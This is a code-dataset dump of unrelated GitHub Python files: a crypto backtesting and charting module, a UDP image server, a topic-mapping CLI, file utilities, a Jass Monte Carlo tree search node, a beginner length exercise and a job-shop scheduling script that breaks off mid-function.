== len(base_index) * short_coin_num\n assert boll1 & boll2\n\n for rank, w in enumerate(long_weight_array):\n select_coin_long[:, 3] = np.where(select_coin_long[:, 5] == rank + 1, w, select_coin_long[:, 3])\n for rank, w in enumerate(short_weight_array):\n select_coin_short[:, 3] = np.where(select_coin_short[:, 5] == rank + 1, w, select_coin_short[:, 3])\n\n select_coin_long[:, 3] = select_coin_long[:, 3] * select_coin_long[:, 6]\n select_coin_short[:, 3] = select_coin_short[:, 3] * select_coin_short[:, 6]\n if not select_by_hour:\n arr_data = []\n else:\n arr_data = [arr_list_long, arr_list_short, long_weight_array, short_weight_array]\n return select_coin_long[:, 1:5], select_coin_short[:, 1:5], arr_data\n\n\n# 前置过滤\ndef filter_before(df1, df2, exec_list, white_list, black_list, replace_symbol_to_int):\n # 固定黑名单与固定白名单\n long_white_list, short_white_list = white_list\n long_black_list, short_black_list = black_list\n\n not_exist_list = [x for x in long_white_list + short_white_list if x not in replace_symbol_to_int]\n if not_exist_list: log.warning(f'白名单中 {not_exist_list}这些币种本地整理的数据中不存在')\n\n long_white_list = [replace_symbol_to_int.get(k, 9999) for k in long_white_list]\n short_white_list = [replace_symbol_to_int.get(k, 9999) for k in short_white_list]\n\n not_exist_list = [x for x in long_black_list + short_black_list if x not in replace_symbol_to_int]\n if not_exist_list: log.warning(f'黑名单中 {not_exist_list}这些币种本地整理的数据中不存在')\n\n long_black_list = [replace_symbol_to_int.get(k, 9999) for k in long_black_list]\n short_black_list = [replace_symbol_to_int.get(k, 9999) for k in short_black_list]\n # log.info(long_white_list)\n # log.info(short_white_list)\n if long_white_list:\n df1 = df1[df1['symbol'].isin(long_white_list)]\n if short_white_list:\n df2 = df2[df2['symbol'].isin(short_white_list)]\n if long_black_list:\n df1 = df1[~df1['symbol'].isin(long_black_list)]\n if short_black_list:\n df2 = df2[~df2['symbol'].isin(short_black_list)]\n\n d = {'df1': df1, 'df2': df2}\n for content in exec_list:\n try:\n exec(content, globals(), d)\n df1 = 
d['df1']\n df2 = d['df2']\n except IndentationError as e:\n raise ValueError(f'{e}:', '请删掉过滤条件每行开头的缩进!')\n return df1, df2\n\n\n# 后置过滤\ndef filter_after(df1, df2, exec_list):\n d = {'df1': df1, 'df2': df2}\n for content in exec_list:\n try:\n exec(content, globals(), d)\n df1 = d['df1']\n df2 = d['df2']\n except IndentationError as e:\n raise ValueError(f'{e}:', '请删掉过滤条件每行开头的缩进!')\n return df1, df2\n\n\ndef gen_selected(df, long_coin_num, short_coin_num, long_p, short_p, header_columns, filter_before_exec, filter_after_exec):\n df1 = df.copy()\n df2 = df.copy()\n # 前置过滤\n df1, df2 = filter_before(df1, df2, filter_before_exec)\n\n # 根据因子对比进行排名\n # 从小到大排序\n df1['排名1'] = df1.groupby('candle_begin_time')['多头因子'].rank(method='first')\n df1 = df1[(df1['排名1'] <= long_coin_num)].copy()\n df1['方向'] = 1\n\n # 从大到小排序\n df2['排名2'] = df2.groupby('candle_begin_time')['空头因子'].rank(\n method='first', ascending=False)\n df2 = df2[(df2['排名2'] <= short_coin_num)].copy()\n df2['方向'] = -1\n\n df1['排名'] = df1['排名1']\n df2['排名'] = df2['排名2']\n del df2['排名2']\n del df1['排名1']\n df1.sort_values('candle_begin_time', ascending=True, inplace=True)\n df1.reset_index(drop=True, inplace=True)\n df2.sort_values('candle_begin_time', ascending=True, inplace=True)\n df2.reset_index(drop=True, inplace=True)\n long_weight_array = w_log(p=long_p, coins_num=long_coin_num)\n short_weight_array = w_log(p=short_p, coins_num=short_coin_num)\n for rank, w in enumerate(long_weight_array):\n df1.loc[df1['排名'] == rank + 1, 'weight'] = w\n for rank, w in enumerate(short_weight_array):\n df2.loc[df2['排名'] == rank + 1, 'weight'] = w\n # 后置过滤\n df1, df2 = filter_after(df1, df2, filter_after_exec)\n return df1[header_columns], df2[header_columns]\n\n\n# 可视化\ndef playback_plot(curve):\n import matplotlib as mpl\n mpl.rcParams[\"font.sans-serif\"] = [\"SimHei\"] # 展示中文字体\n mpl.rcParams[\"axes.unicode_minus\"] = False # 处理负刻度值\n nv = curve.iloc[:, 0]\n dd = (nv / nv.cummax() - 1) * 100\n fig, ax1 = plt.subplots() # subplots一定要带s\n fig.set_size_inches(14, 8)\n ax2 = ax1.twinx() # twinx将ax1的X轴共用与ax2,这步很重要\n ax1.fill_between(dd.index, 0, dd, color='#95a3a6', alpha=0.4)\n # ax1.set_ylabel('Log')\n ax2.plot(nv, c='r')\n ax2.grid(True, axis='both', color='#95a3a6')\n ax1.grid(False, axis='y')\n ax1.tick_params(labelsize=18)\n ax2.tick_params(labelsize=18)\n ax1.legend(['最大回撤'], loc='center left', fontsize=18)\n ax2.legend(['净值'], loc='center right', fontsize=18)\n # ax2.set_ylabel('Log')\n ax2.set_yscale('log')\n ax2.set_title(f'中性策略回放', fontsize=24)\n plt.show()\n\n\ndef plot_output(x, data, data_path, save_html=True):\n x = x.copy()\n data.index.name = ''\n data = data[['累积净值', '年化收益', '月化收益', '月信息比', '月化波动', '月换手率', '月化收益回撤比', '累积净值', '最大回撤', '最大回撤开始时间',\n '最大回撤结束时间', '胜率', '盈亏收益比', '单周期最大盈利',\n '单周期大亏损', '交易费率', 'leverage']].reset_index()\n data['交易费率'] = data['交易费率'].round(1).astype('int')\n part1 = data.iloc[:, :1].T.values.tolist()\n\n part2 = np.round(data.iloc[:, 1:9].T.values, 2).tolist()\n\n part3 = data.iloc[:, 9:].T.values.tolist()\n\n values = part1 + part2 + part3\n x['net_value'] = x['资金曲线'].round(4)\n\n x.reset_index(inplace=True)\n x['long_hold_symbol'] = x['long_hold_symbol'].str.replace('USDT', '')\n x['short_hold_symbol'] = x['short_hold_symbol'].str.replace('USDT', '')\n\n fig = make_subplots(\n rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.02,\n specs=[[{\"type\": \"table\", \"secondary_y\": False}],\n [{\"type\": \"xy\", \"secondary_y\": True}],\n [{\"type\": \"xy\", \"secondary_y\": True}]],\n row_heights=[0.1, 0.75, 
0.15],\n )\n\n # 主图\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['net_value'], mode='lines', name='策略净值',\n text=x['long_hold_symbol'] + ' --- ' + x['short_hold_symbol']),\n secondary_y=False, row=2, col=1,\n )\n\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=(x['net_value'] / x['net_value'].cummax() - 1).round(4), mode='lines', name='最大回撤',\n line={'color': 'rgba(192,192,192,0.6)', 'width': 1}),\n secondary_y=True, row=2, col=1,\n )\n\n # 副图\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['多头占比'], mode='none', name='多头杠杆率', stackgroup='one'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['空头占比'], mode='none', name='空头杠杆率', stackgroup='one'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Bar(x=x['candle_begin_time'], y=(x['多头占比'] - x['空头占比']), name='多空敞口差额'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Table(\n header=dict(values=list(data.columns), # 表头取值是data列属性\n fill_color='paleturquoise', # 填充色和文本位置\n align='center'),\n cells=dict(values=values, # 单元格的取值就是每个列属性的Series取值\n fill_color='lavender',\n align='center'\n ),\n columnwidth=[90, 40, 40, 35, 35, 35, 35, 50, 35, 35, 90, 90, 30, 40, 60, 60, 40, 40]),\n secondary_y=False, row=1, col=1,\n )\n fig.update_layout(\n yaxis_type='log', yaxis2_type='linear',\n template='none', hovermode='x', width=1650, height=950,\n xaxis_rangeslider_visible=False,\n )\n html_path = os.path.join(data_path, '净值曲线持仓图.html')\n\n if save_html:\n fig.write_html(file=html_path, config={'scrollZoom': True})\n else:\n fig.show(config={'scrollZoom': True})\n\n\ndef curve_playback(curve, play_start_time, step=6, sleeptime=0.2):\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n nv = curve.iloc[:, 0]\n dd = (nv / nv.cummax() - 1) * 100\n fig, ax1 = plt.subplots() # subplots一定要带s\n fig.set_size_inches(14, 8)\n ax2 = ax1.twinx() # twinx将ax1的X轴共用与ax2,这步很重要\n _curve = curve.reset_index()\n i = _curve[_curve['candle_begin_time'] >= play_start_time].index[0]\n _i = i - 1\n for i in range(i, curve.shape[0], step):\n end_time = curve.index[i]\n ax1.cla()\n ax2.cla()\n # ax1.plot(curve['最大回撤'].iloc[:i],c='r')\n ax1.fill_between(dd.iloc[:i].index, 0, dd.iloc[:i], color='#95a3a6', alpha=0.4)\n # ax1.set_ylabel('EXP')\n ax2.plot(nv.iloc[:_i], c='r')\n ax2.plot(nv.iloc[_i:i], c='blue')\n ax2.grid(True, axis='both', color='#95a3a6')\n ax1.grid(False, axis='y')\n ax1.tick_params(labelsize=18)\n ax2.tick_params(labelsize=18)\n ax1.legend(['最大回撤'], loc='center left', fontsize=18)\n ax2.legend(['净值'], loc='center right', fontsize=18)\n # ax2.set_ylabel('Log')\n ax2.set_title(f'策略回放 起始时间:{curve.index[_i]} 截止时间:{end_time}', fontsize=18)\n plt.pause(sleeptime)\n plt.show()\n\n\ndef plot(select_c, mdd_std=0.2):\n # plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n # plt.figure(figsize=(12, 6), dpi=80)\n # plt.figure(1)\n\n condition = (select_c['dd2here'] >= -mdd_std) & (select_c['dd2here'].shift(1) < -mdd_std)\n select_c[f'回撤上穿{mdd_std}次数'] = 0\n select_c.loc[condition, f'回撤上穿{mdd_std}次数'] = 1\n mdd_num = int(select_c[f'回撤上穿{mdd_std}次数'].sum())\n ax = plt.subplot(2, 1, 1)\n\n plt.subplots_adjust(hspace=1) # 调整子图间距\n plt.title(f'Back draw{mdd_std} Number: {mdd_num}', fontsize='large', fontweight='bold', color='blue', loc='center') # 设置字体大小与格式\n 
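# primary axis: equity curve; secondary (twinx) axis: drawdown depth, negated so deeper drawdowns plot higher\n 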
ax.plot(select_c['candle_begin_time'], select_c['资金曲线'])\n ax2 = ax.twinx() # 设置y轴次轴\n ax2.plot(select_c[\"candle_begin_time\"], -select_c['dd2here'], color='red', alpha=0.4)\n\n\n# plt.show()\ndef plot_log(ret, title):\n # plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n # plt.figure(figsize=(12, 6), dpi=80)\n # plt.figure(1)\n import matplotlib\n ax = plt.subplot(2, 1, 2)\n ax_left = ax\n ax_right = ax_left.twinx()\n ret = ret.copy()\n ret.index = pd.to_datetime(ret.index)\n nv = (1 + ret).cumprod() # 净值\n dd = nv / nv.cummax() - 1 # 回撤\n # 右轴:净值曲线\n ax_right.grid(False)\n ax_right.plot(nv.index, nv.values, color='red')\n ax_right.set(xlim=(nv.index[0], nv.index[-1]))\n # 左轴:ax, 回撤\n # y2 = dd.values * 100\n y2 = dd['本周期多空涨跌幅'] * 100\n ax_left.fill_between(dd.index, 0, y2, color='#95a3a6', alpha=0.4)\n ax_left.set_ylim((ax_left.get_ylim()[0], 0))\n ax_left.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f%%'))\n ax_left.grid(False, axis='y')\n # ax_right.grid(True, axis='y', color='#95a3a6')\n ax_right.grid(True, axis='both', color='#95a3a6')\n ax_left.legend(['回撤'], loc='center left')\n ax_right.legend(['净值'], loc='center right')\n if title is not None:\n ax_left.set_title(title)\n\n ax_right.set_yscale('log')\n\n\ndef multi_plot(curve):\n # 原版评价作图\n curve['本周期多空涨跌幅'] = curve['资金曲线'].pct_change().fillna(0)\n curve = curve.reset_index()\n rtn, select_c = ind.cal_ind(curve)\n\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n elif platform.system() == 'Linux':\n # Linux\n plt.rcParams['font.sans-serif'] = ['AR PL UKai CN'] # 指定默认字体\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n plt.figure(figsize=(12, 6), dpi=80)\n plt.figure(1)\n\n # 收益回撤曲线图\n plot(select_c, mdd_std=0.2)\n # 对数图\n ret = curve[['candle_begin_time', '本周期多空涨跌幅']]\n ret = ret.set_index('candle_begin_time')\n title = '收益(对数坐标)-回撤'\n plot_log(ret, title)\n plt.show()\n\n\ndef plot_log_double(curve, mdd_std=0.2, path='./'):\n # 原版评价作图\n curve['本周期多空涨跌幅'] = curve['资金曲线'].pct_change().fillna(0)\n curve = curve.reset_index()\n all_select_df = curve\n rtn, select_c = ind.cal_ind(curve)\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n elif platform.system() == 'Linux':\n # Linux\n plt.rcParams['font.sans-serif'] = ['AR PL UKai CN'] # 指定默认字体\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n plt.figure(figsize=(12, 6), dpi=80)\n condition = (select_c['dd2here'] >= -mdd_std) & (select_c['dd2here'].shift(1) < -mdd_std)\n select_c[f'回撤上穿{mdd_std}次数'] = 0\n select_c.loc[condition, f'回撤上穿{mdd_std}次数'] = 1\n mdd_num = int(select_c[f'回撤上穿{mdd_std}次数'].sum())\n ax = plt.subplot(2, 1, 1)\n\n plt.subplots_adjust(hspace=1) # 调整子图间距\n plt.title(f'Back draw{mdd_std} Number: {mdd_num}', fontsize='large', fontweight='bold', color='blue',\n loc='center') # 设置字体大小与格式\n ax.plot(select_c['candle_begin_time'], select_c['资金曲线'])\n ax2 = ax.twinx() # 设置y轴次轴\n ax2.plot(select_c[\"candle_begin_time\"], -select_c['dd2here'], color='red', alpha=0.4)\n\n # 对数图\n ret = all_select_df[['candle_begin_time', '本周期多空涨跌幅']]\n ret = ret.set_index('candle_begin_time')\n title = 'Balance Curve(Log) - Back draw'\n ax = plt.subplot(2, 1, 2)\n ax_left = ax\n ax_right = ax_left.twinx()\n ret = ret.copy()\n ret.index = pd.to_datetime(ret.index)\n nv = (1 + 
ret).cumprod() # 净值\n dd = nv / nv.cummax() - 1 # 回撤\n # 右轴:净值曲线\n ax_right.grid(False)\n ax_right.plot(nv.index, nv.values, color='red')\n ax_right.set(xlim=(nv.index[0], nv.index[-1]))\n # 左轴:ax, 回撤\n # y2 = dd.values * 100\n y2 = dd['本周期多空涨跌幅'] * 100\n ax_left.fill_between(dd.index, 0, y2, color='#95a3a6', alpha=0.4)\n ax_left.set_ylim((ax_left.get_ylim()[0], 0))\n ax_left.yaxis.set_major_formatter(tc.FormatStrFormatter('%.1f%%'))\n ax_left.grid(False, axis='y')\n ax_right.grid(True, axis='both', color='#95a3a6')\n ax_left.legend(['Back draw'], loc='center left')\n ax_right.legend(['Balance'], loc='center right')\n if title is not None:\n ax_left.set_title(title)\n\n # 倍增图叠加\n balance_list = [all_select_df.loc[0, '资金曲线']]\n time_list = [all_select_df.loc[0, 'candle_begin_time']]\n balance = all_select_df.loc[0, '资金曲线']\n while balance <= all_select_df['资金曲线'].max():\n balance *= 2\n _df = all_select_df[all_select_df['资金曲线'] >= balance]\n _df.reset_index(drop=True, inplace=True)\n if _df.shape[0] > 0:\n balance_list.append(_df.loc[0, '资金曲线'])\n time_list.append(_df.loc[0, 'candle_begin_time'])\n ax_right.scatter(time_list, balance_list, color='red')\n ax_right.set_yscale('log')\n\n plt.show()\n","repo_name":"RootSherry/NK_quant","sub_path":"src_backtesting/playback/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":66453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28720751719","text":"import restoreModel as model\nimport socket\nimport base64\n# from PIL import Image\n# import matplotlib.pyplot as plt\n# import matplotlib.image as mpimg\n\nipServer = \"10.0.0.10\"\nportServer = 6789\n\n\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserverSocket.bind((ipServer, portServer))\n\nclientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# model.main()\n\nwhile True:\n data, addr = serverSocket.recvfrom(58096)\n # newdata = data[:4] + data[lenght(data):]\n data1 = base64.b64decode(data)\n fh = open(\"./try/try.png\", \"wb\")\n fh.write(data1)\n fh.close()\n # print(data)\n if(data1):\n # image = mpimg.imread('./try.png')\n # plt.imshow(image)\n # plt.show()\n print(\"message\", data1)\n clientSocket.sendto(model.test().encode(), (addr))\n print('okk')\n\n","repo_name":"DeafTranslator/server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1363715189","text":"import json\nimport csv\nimport yaml\ntry:\n from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n\n\nimport typer\n\n\napp = typer.Typer()\n\nMAPPER_FILE = '../refined/prepared.csv'\nDATA_THEMES_FILE = '../reference/data_themes.yaml'\nISO19115_FILE = '../reference/iso19115.yaml'\nRULES_THEME_FILE = '../reference/rules_data_theme.yaml'\nRULES_GEO_FILE = '../reference/rules_geo.yaml'\n\n\n@app.command()\ndef convert():\n \"\"\"Convert mapped data to yaml rules\"\"\"\n themes = {}\n f = open(DATA_THEMES_FILE, 'r', encoding='utf8')\n themes_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in themes_data:\n print(row)\n themes[row['id']] = row['name']\n\n data_geo = []\n data_theme = []\n texts = []\n f = open(MAPPER_FILE, 'r', encoding='utf8')\n reader = csv.DictReader(f, delimiter=',') \n for row in reader:\n print(row)\n text = row['Name']\n if len(row['Data theme']) > 0:\n parts = row['Data 
theme'].split(',')\n record = {'key': text, 'topics': []}\n for part in parts:\n record['topics'].append(themes[part])\n data_theme.append(record)\n if len(row['EN ISO 19115']) > 0:\n parts = row['EN ISO 19115'].split(',')\n record = {'key': text, 'topics': []}\n for part in parts:\n record['topics'].append(part)\n data_geo.append(record)\n f.close()\n f = open(RULES_THEME_FILE, 'w', encoding='utf8')\n f.write(yaml.dump(data_theme, Dumper=Dumper))\n f.close()\n f = open(RULES_GEO_FILE, 'w', encoding='utf8')\n f.write(yaml.dump(data_geo, Dumper=Dumper))\n f.close()\n\n@app.command()\ndef identify(text):\n \"\"\"Identifies data themes and geo topics for the text provided. Very slow and inefficient; a temporary solution to test topic mapping for the Common Data Index\"\"\"\n themes = {}\n f = open(RULES_THEME_FILE, 'r', encoding='utf8')\n themes_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in themes_data:\n themes[row['key']] = row['topics']\n\n geo = {}\n f = open(RULES_GEO_FILE, 'r', encoding='utf8')\n geo_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in geo_data:\n geo[row['key']] = row['topics']\n \n\n notfound = True\n if text in themes.keys():\n print('Topics for text %s: %s' % (text, ','.join(themes[text])))\n notfound = False \n if text in geo.keys():\n print('Geo topics for text %s: %s' % (text, ','.join(geo[text])))\n notfound = False \n if notfound:\n print('Topics not found')\n\nif __name__ == \"__main__\":\n app()","repo_name":"commondataio/cdi-topicmapper","sub_path":"scripts/topicmapper.py","file_name":"topicmapper.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72484378999","text":"from collections import defaultdict\nimport numpy as np\nfrom threading import Timer\nfrom jass.game import game_state_util\nfrom jass.game.game_sim import GameSim\nfrom jass.game.game_state import GameState\nfrom jass.game.rule_schieber import RuleSchieber\nfrom numpy import ndarray\n\n\nclass DMCTSNode:\n\n def __init__(self, game_state: GameState, player_number, parent=None, parent_action=None):\n self.game_state = game_state\n self.player_number = player_number\n self.parent = parent\n self.parent_action = parent_action\n self.children = []\n self.visits_count = 0\n self.results = defaultdict(int)\n self.win_score = 0\n self.rule = RuleSchieber()\n self.game_sim = GameSim(RuleSchieber())\n self.untried_actions = None\n self.__get_untried_actions()\n\n def __get_untried_actions(self) -> ndarray:\n valid_cards = self.rule.get_valid_actions_from_obs(\n game_state_util.observation_from_state(self.game_state, self.player_number))\n self.untried_actions = np.flatnonzero(valid_cards)\n return self.untried_actions\n\n def best_action(self, iteration_budget: int) -> int:\n iteration_counter = 0\n while iteration_counter < iteration_budget:\n v = self.__tree_policy()\n reward = v.rollout()\n v.backpropagate(reward)\n iteration_counter += 1\n return self.__best_child().parent_action\n\n def __tree_policy(self):\n current_node = self\n while not current_node.is_terminal_node():\n if not current_node.__is_fully_expanded():\n return current_node.expand()\n else:\n current_node = current_node.__best_child()\n return current_node\n\n def rollout(self) -> int:\n self.game_sim.init_from_state(self.game_state)\n while not self.game_sim.is_done():\n # possible_moves = ruleSchieber.get_valid_actions_from_obs(gameSim.get_observation())\n possible_moves = 
self.rule.get_valid_cards(self.game_sim.get_observation().hand,\n self.game_sim.get_observation().current_trick,\n self.game_sim.get_observation().nr_cards_in_trick,\n self.game_sim.get_observation().trump)\n action = self.__rollout_policy(possible_moves)\n self.game_sim.action_play_card(action)\n\n points = self.game_sim.state.points\n return 1 if points[0] > points[1] else 0\n\n def difference_win_loss(self):\n # rollout() returns 1 for a win and 0 for a loss, so losses are tallied under key 0\n wins = self.results[1]\n loses = self.results[0]\n return wins - loses\n\n def expand(self):\n action, self.untried_actions = self.untried_actions[-1], self.untried_actions[:-1]\n # Initialize GameSim with state\n self.game_sim.init_from_state(self.game_state)\n self.game_sim.action_play_card(action)\n child_node = DMCTSNode(self.game_state, self.player_number, parent=self, parent_action=action)\n self.children.append(child_node)\n return child_node\n\n @staticmethod\n def __rollout_policy(possible_moves):\n return possible_moves[np.random.randint(len(possible_moves))]\n\n def __increment_visits(self):\n self.visits_count += 1\n\n def is_terminal_node(self):\n return self.game_state.nr_played_cards == 36\n\n def backpropagate(self, result):\n self.visits_count += 1\n self.results[result] += 1\n if self.parent:\n self.parent.backpropagate(result)\n\n def __is_fully_expanded(self):\n return len(self.untried_actions) == 0\n\n def __best_child(self, c_param=0.5):\n choices_weights = [(c.difference_win_loss() / c.visits_count) + c_param * np.sqrt(\n (np.log(self.visits_count) / c.visits_count)) for c in self.children]\n return self.children[np.argmax(choices_weights)]\n","repo_name":"dave1b/DL4G","sub_path":"determination_monte_carlo_tree_search/dmcts_node.py","file_name":"dmcts_node.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43963335356","text":"import json\nimport re\nfrom json import JSONDecodeError\nimport yaml\n\n\ndef write_to_file(path, ls) -> None:\n \"\"\"\n Write retrieved data to file.\n Parameters\n ----------\n path : str\n Path to file where data is stored\n ls : list\n List of dictionaries containing retrieved data\n \"\"\"\n if ls is not None:\n try:\n with open(path, \"r\") as f:\n json_file = json.load(f)\n except FileNotFoundError as e:\n json_file = []\n except JSONDecodeError:\n json_file = []\n\n json_file.append(ls)\n\n with open(path, \"w\") as f:\n json.dump(json_file, f, indent=4)\n else:\n pass\n\n\n# Function to count the number of words between quotation marks\n# This is used to count the number of words in the query\n# This is necessary because the OPS API has a limit of 20 words (terms) per query\ndef count_words_between_quotes(request):\n word_count = 0\n # Regex to find all phrases between quotation marks\n phrases = re.findall(r'\"(.*?)\"', request)\n for phrase in phrases:\n # Splitting each phrase by space to count words\n word_count += len(phrase.split())\n return word_count\n\n\ndef load_config(path: str) -> dict:\n with open(path, \"r\") as stream:\n config = yaml.safe_load(stream)\n return config\n","repo_name":"Jonasrg/BT_AI","sub_path":"source/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71250065402","text":"#wap to enter two separate distances in meters and centimeters and print their sum\n#10m 25cm + 12m 95cm = 23m 20cm\n\n\nfirst_m = int(input(\"enter the first length in m: 
\"))\nfirst_cm = int(input(\"enter the first length in cm: \"))\n\nsecond_m = int(input(\"enter the second length in m: \"))\nsecond_cm = int(input(\"enter the second length in cm: \"))\n\n\nadd_m = first_m + second_m\nadd_cm = first_cm + second_cm\n\nif first_cm < 100 and second_cm < 100:\n if add_cm >= 100:\n add_m += 1\n add_cm = add_cm - 100\n print(\"total length after calculation is: \" +str(add_m) + \" m and \" + str(add_cm) + \" cm\")\n elif add_cm < 100:\n print(\"total length after calculation is: \" +str(add_m) + \" m and \" + str(add_cm) + \" cm\")\n\n\n\n\n\n\n","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_2/37.py","file_name":"37.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73289493240","text":"import math\nimport pandas as pd\nimport numpy as np\nimport sys, math, time\nfrom pathlib import Path\nfrom fcmaes import retry, advretry, mode, modecpp, moretry\nfrom fcmaes.optimizer import Bite_cpp, Cma_cpp, De_cpp, de_cma, dtime, Differential_evolution\nfrom scipy.optimize import Bounds\nimport ctypes as ct\nimport multiprocessing as mp \nfrom numba import njit, numba\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nimport sys \nfrom loguru import logger\n\nlogger.remove()\nlogger.add(sys.stdout, format=\"{time:HH:mm:ss.SS} | {process} | {level} | {message}\")\nlogger.add(\"log_{time}.txt\")\n\ndef read_fjs(filename):\n inf = 1000000\n with open(filename) as f:\n lines = f.readlines()\n first_line = lines[0].split()\n n_jobs = int(first_line[0])\n n_machines = int(first_line[1])\n nb_operations = [int(lines[j + 1].split()[0]) for j in range(n_jobs)]\n n_operations = np.sum(nb_operations)\n nb_tasks = sum(nb_operations[j] for j in range(n_jobs))\n processing_time = [[inf for m in range(n_machines)] for t in range(nb_tasks)]\n # For each job, for each operation, the corresponding task id\n operation_task = [[0 for o in range(nb_operations[j])] for j in range(n_jobs)]\n sum_time = 0\n id = 0\n for j in range(n_jobs):\n line = lines[j + 1].split()\n tmp = 0\n for o in range(nb_operations[j]):\n n_machines_operation = int(line[tmp + o + 1])\n for i in range(n_machines_operation):\n machine = int(line[tmp + o + 2 * i + 2]) - 1\n time = int(line[tmp + o + 2 * i + 3])\n processing_time[id][machine] = time\n sum_time += time\n operation_task[j][o] = id\n id += 1\n tmp += 2 * n_machines_operation\n tasks = []\n for job in range(n_jobs):\n jtasks = operation_task[job]\n for task in jtasks:\n times = processing_time[task]\n for machine in range(n_machines):\n time = times[machine]\n if time < inf:\n tasks.append((job, task, machine, time))\n \n return np.array(tasks), n_jobs, n_machines, n_operations, sum_time\n\ndef gantt(data):\n df = pd.DataFrame.from_dict(data)\n df['duration']=df.end-df.start \n p_start=df.start.min()\n p_end=df.end.max()\n p_duration=(p_end-p_start+1)\n df['rel_start']=df.start.apply(lambda x: (x-p_start))\n x_ticks=[i for i in range(int(p_duration+1))]\n x_labels=[(p_start+i) for i in x_ticks] \n plt.figure(figsize=(8,4))\n cols = sns.color_palette()\n machines = list(df.machine) \n mi = np.argsort(machines) \n y = 0\n last = machines[mi[0]]\n for i in mi:\n if machines[i] != last:\n last = machines[i]\n y += 1\n plt.barh(y='M' + str(machines[i]), left=df.rel_start[i], \n width=df.duration[i], color=cols[df.job[i] % len(cols)])\n plt.text(x=df.rel_start[i], y=y, s = str(df.task[i]))\n plt.gca().invert_yaxis()\n plt.xticks(ticks=x_ticks, 
labels=x_labels)\n plt.title('Gantt Chart')\n plt.xticks(rotation=60)\n plt.grid(axis='x', alpha=0.5)\n plt.savefig('gantt.png')\n plt.show()\n\ndef scheduling(tasks, n_jobs, n_machines):\n machine_time = np.zeros(n_machines)\n job_time = np.zeros(n_jobs)\n solution = {'machine': [], 'start': [], 'end': [], 'job': [], 'task':[]}\n for task in tasks:\n job = int(task[0])\n machine = int(task[2])\n time = task[3]\n # previous task needs to be finished and machine needs to be available\n start = max(machine_time[machine], job_time[job])\n end = start + time\n machine_time[machine] = end\n job_time[job] = end \n solution['machine'].append(int(machine))\n solution['start'].append(int(start))\n solution['end'].append(int(end))\n solution['job'].append(int(job))\n solution['task'].append(int(task[1]))\n return solution\n\ndef chart(tasks, n_jobs, n_machines):\n solution = scheduling(tasks, n_jobs, n_machines)\n logger.info(solution)\n gantt(solution)\n \n@njit(fastmath=True) \ndef job_indices(tasks):\n indices = []\n ids = []\n n = tasks.shape[0]\n j = 0\n last = tasks[0]\n indices.append(j)\n for i in range(n+1):\n if i == n or tasks[i][0] != last[0] or tasks[i][1] != last[1]: # new operation\n ids.append(last[0])\n if (i < n and tasks[i][0] != last[0]):\n indices.append(j+1)\n j += 1\n if i < n: \n last = tasks[i]\n return np.array(indices), np.array(ids)\n\n@njit(fastmath=True) \ndef reorder(tasks, order, n_operations, job_ids, job_indices):\n ids = job_ids[order]\n ordered = np.empty((n_operations,4))\n op_index = np.zeros(n_operations, dtype=numba.int32)\n for i in range(n_operations):\n machine = ids[i]\n index = job_indices[machine] + op_index[machine]\n op_index[machine] += 1\n ordered[i] = tasks[index]\n return ordered\n \n@njit(fastmath=True) \ndef exec_tasks(tasks, n_jobs, n_machines):\n machine_time = np.zeros(n_machines)\n machine_work_time = np.zeros(n_machines)\n job_time = np.zeros(n_jobs)\n for task in tasks:\n job = int(task[0])\n machine = int(task[2])\n time = task[3]\n # previous task needs to be finished and machine needs to be available\n end_time = max(machine_time[machine], job_time[job]) + time\n machine_time[machine] = end_time\n job_time[job] = end_time \n machine_work_time[machine] += time\n #print(\"exec job {0} task {1} machine {2} start {3} end {4}\".format(job, int(task[1]), machine, end_time-time, 